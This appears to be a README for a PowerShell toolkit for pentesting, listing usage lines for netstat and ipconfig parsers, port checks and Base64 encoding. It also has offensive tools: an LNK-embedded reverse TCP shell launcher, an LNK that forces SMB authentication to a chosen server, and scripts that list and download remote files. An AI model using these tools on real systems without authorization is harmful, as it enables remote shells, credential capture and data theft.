Collection of tools for parsing output of basic network commands
Parses saved Netstat output (supports any/all of -a, -n, -o) and returns an object.
Import-Netstat -Path C:\Path\To\File(s)
Parses text files containing output of ipconfig or ipconfig /all and returns an object.
Import-IPConfig -Path C:\Path\To\File(s)
Collection of simple tools to make life a little less manual while pentesting.
Creates a reverse TCP shell launcher embedded in a LNK file.
New-LNKShell -ComputerName -Port 4444 -Application calc.exe
Creates an LNK file that, when viewed, will cause a client to authenticate to the specified server.
.\New-SMBLNK.ps1 -ComputerName -Share Files -Application calc.exe
Module containing two functions, one for pulling a list of remote files, the other for downloading interesting ones.
PS C:\> Export-FileList -ComputerName FOO1 -Drive C -Directory Temp -OutputPath C:\Path\To\Output
PS C:\> Get-File.ps1 -TargetFiles targets.csv -OutPath C:\Path\To\Output
Removes files older than n days. Defaults to C:\Users<YOU>\Downloads and 30 days
Remove-Files -Path C:\Path\To\Files -MaxAge 60
Checks for open port and returns $True if open.
Test-Port.ps1 -Protocol TCP -Port 3389 -Targets
Encode text to a Base64 string and back again.
Get-Base -String 'Hello World!' >>> SGVsbG8gV29ybGQh
Get-Base -Base64 'SGVsbG8gV29ybGQh' >>> Hello World!
Uses WMI to remotely gather information about network interfaces on target computer(s).
PS C:\> Get-NetInfo -ComputerName COMPUTER01 -Credential dmz\administrator
A noisy, hacky way of testing for writable directories.
PS C:\> Get-WritablePath -Path C:\Path\To\Files
Creates a folder hierarchy full of random files/folders.
PS C:\> Get-WritablePath -Path C:\Path\To\Files